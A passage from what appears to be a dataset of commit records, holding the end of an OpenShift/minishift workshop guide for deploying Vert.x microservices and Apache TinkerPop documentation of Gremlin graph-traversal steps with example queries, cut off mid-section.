host name.\n\nimage::openshift-entities.png[OpenShift Entities, 800]\n\n### Installing and Starting OpenShift\n\nWe are going to use _minishift_ (https:\/\/github.com\/minishift\/minishift) to run OpenShift locally on your machine.\n\nBefore starting minishift, you need to install a hypervisor. Check the https:\/\/docs.openshift.org\/latest\/minishift\/getting-started\/installing.html to check what are the supported ones depending on your operating system. In case of doubt, use VirtualBox (https:\/\/www.virtualbox.org\/wiki\/Downloads). Be sure to have a hypervisor before continuing.\n\nIf not already done, download the latest releases from https:\/\/github.com\/minishift\/minishift\/releases (don't\nuse beta). Download the archive and copy the `minishift` executable in the directory of your choice. Add this\ndirectory to your system `$PATH`. \n\nThen, in a terminal, run:\n\n[source, bash]\n----\nminishift start\n----\n\nWhen the starting sequence completes, you should get the URL of the OpenShift Web Console such as: `https:\/\/192.168\n.64.12:8443`. Open this url in a browser and connect using the `developer\/developer` credentials.\n\nNow we have OpenShift running. But we need a way to interact with it. The _OpenShift Client_ (`oc`) is a command line\n tool to interact with OpenShift. Fortunately, this client is shipped with minishift. Use `minishift oc-env` to display\n the command you need to type into your shell in order to add the oc binary to your PATH environment variable. Then,\n run the following `oc` command to connect to your OpenShift instance:\n\n[source, bash]\n----\noc login -u developer -p developer\n----\n\nNow, you are ready to deploy your first application.\n\n### Your first project and deployment\n\nWe are going to use a specific project to host all the microservices developed in this lab. A `project` is a\nnamespace making easy to organize your different application in OpenShift. In a terminal run:\n\n[source, bash]\n----\noc new-project vertx-kubernetes-workshop\noc policy add-role-to-user view admin -n vertx-kubernetes-workshop\noc policy add-role-to-user view -n vertx-kubernetes-workshop -z default\noc policy add-role-to-group view system:serviceaccounts -n vertx-kubernetes-workshop\n----\n\nThe first instruction creates the project. The 3 last instructions grants permissions in order to use all the\nOpenShift capabilities.\n\nIn the OpenShift Web Console, you should see the newly created project. Click on it. It's empty, let's deploy our\nfirst application.\n\nIn the workshop source code, locate the `currency-3rdparty-service`, and navigate in the directory in your terminal.\nThen issue the `mvn fabric8:deploy` command:\n\n[source, bash]\n----\ncd $WORKSHOP_ROOT\/currency-3rdparty-service\nmvn fabric8:deploy\n----\n\nThe `fabric8 maven plugin` is a Maven Plugin facilitating the deployment of OpenShift applications. The `:deploy`\nmojo packages the application and triggers the S2I build are described above.\n\nIn your browser, check the content of the project. You should see something like:\n\nimage::openshift-first-deployment.png[First deployment, 1024]\n\n\nClick on the route url, you should see `ok`.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d11ce9c0ca90f3dc060db402f65554acd5349af4","subject":"added discussion of vendor optimization strategy to docs.","message":"added discussion of vendor optimization strategy to docs.\n","repos":"rmagen\/incubator-tinkerpop,robertdale\/tinkerpop,samiunn\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,dalaro\/incubator-tinkerpop,robertdale\/tinkerpop,velo\/incubator-tinkerpop,krlohnes\/tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,apache\/tinkerpop,PommeVerte\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,newkek\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,vtslab\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,krlohnes\/tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,PommeVerte\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,pluradj\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,apache\/tinkerpop,apache\/incubator-tinkerpop,apache\/tinkerpop,RedSeal-co\/incubator-tinkerpop,samiunn\/incubator-tinkerpop","old_file":"docs\/src\/the-traversal.asciidoc","new_file":"docs\/src\/the-traversal.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. GraphTraversal provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` can be spawned off of a Graph, Vertex, Edge, or VertexProperty. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) are provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are four generic steps by which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has an age-property.\n<2> The more specific `has()`-step is implemented as a `filter()` with respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nIt is possible to mutate the graph within a traversal. The typical mutations are adding\/removing vertices, edges, and properties. To add edges, there are a collection of `addE()`-steps (*map*\/*sideEffect*).\n\n[gremlin-groovy,modern]\n----\ng.V(1).addOutE('co-worker',g.V(2),'year',2009) <1>\ng.V(4).addInE('createdBy',g.V(3,5)) <2>\ng.V(1).addOutE('livesNear',g.V(2),'year',2009).inV().inE('livesNear').values('year') <3>\ng.V(1).out('livesNear')\n----\n\n<1> Add an outgoing co-worker edge from the marko-vertex to the vadas-vertex with a year property of value 2009.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> The newly created edge is a traversable object.\n\nimage::addedge-step.png[width=450]\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit in the data was is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is defined by the traversal description. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived.\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created')\ng.V(1).as('a').out('created').in('created')\ng.V(1).as('a').out('created').in('created').where(neq('a')) <1>\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addOutE('co-developer','a').outV().\n addInE('co-developer','a')\ng.V(1).out('co-developer').values('name')\ng.V(1).in('co-developer').values('name')\n----\n\n<1> Marko can't be a co-developer with himself.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV(label,'person','name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35)\ng.V(1).valueMap()\n----\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n\t\n\t\"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate()\ng.V().out('knows').aggregate().by('name')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().has(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select() <1>\ng.V().as('a').out('created').as('b').select().by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select().\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(outE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclic()`-path should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nWARNING: The `dedup()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal de-duplication only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. When `dedup()` is an end step, the resultant traversers are de-duplicated by `TraverserMapReduce`.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove element and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\nWARNING: The `group()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal grouping only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. However, `GroupMapReduce` provides unified groups at the end of the traversal computation.\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n\t\"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n\t\"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\nWARNING: The `groupCount()`-step does not have a correlate in <<traversalvertexprogram,Gremlin OLAP>> when used mid-traversal. When in mid-traversal grouping only occurs at the the current processing vertex and thus, is not a global operation as it in Gremlin OLTP. However, `GroupCountMapReduce` provides unified groups at the end of the traversal computation.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element has a value for the key.\n * `hasNot(key)`: Remove the traverser if its element does not have a value for the key.\n * `has(traversal)`: Remove the traverser if its object does not yield a result through the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n\nIt is also possible to filter any arbitrary object based on a anonymous traversal yielding at least one result.\n\n[gremlin-groovy,modern]\n----\ng.V().has(out('created')).values('name') <1>\ng.V().out('knows').has(out('created')).values('name') <2>\ng.V().has(out('created').count().is(gte(2L))).values('name') <3>\ng.V().has(out('knows').has(out('created'))).values('name') <4>\n----\n\n<1> What are the names of the people who have created a project?\n<2> What are the names of the people that are known by someone one and have created a project?\n<3> What are the names of the people how have created two or more projects?\n<4> What are the names of the people who know someone that has created a project? (This only works in OLTP -- see the `WARNING` below)\n\nWARNING: The anonymous traversal of `has()` processes the current object \"locally\". In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().has(__.in('created').count().is(1l)).values('name') <1>\ng.V().has(__.in('created').count().is(gte(2l))).values('name') <2>\ng.V().has(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).\n value().as('location').select().by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).\n value().as('location').select().by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, get their two most historic locations.\n\nThe two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in a object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.\n\nWARNING: The anonymous traversal of `local()` processes the current object \"locally.\" In OLAP, where the atomic unit of computing is the the vertex and its local \"star graph,\" it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) is introduced into TinkerPop3 to support a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. Similar constructs were available in previous TinkerPop versions via the `table()`-step, but that has since been removed in favor of the `match().select()`-pattern. With MatchStep in TinkerPop, a query optimizer similar to the link:http:\/\/www.knowledgefrominformation.com\/2011\/04\/16\/budget-match-cost-effective-subgraph-matching-on-large-networks\/[budget match algorithm] builds and revises query plans on the fly, while a query is in progress. For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the 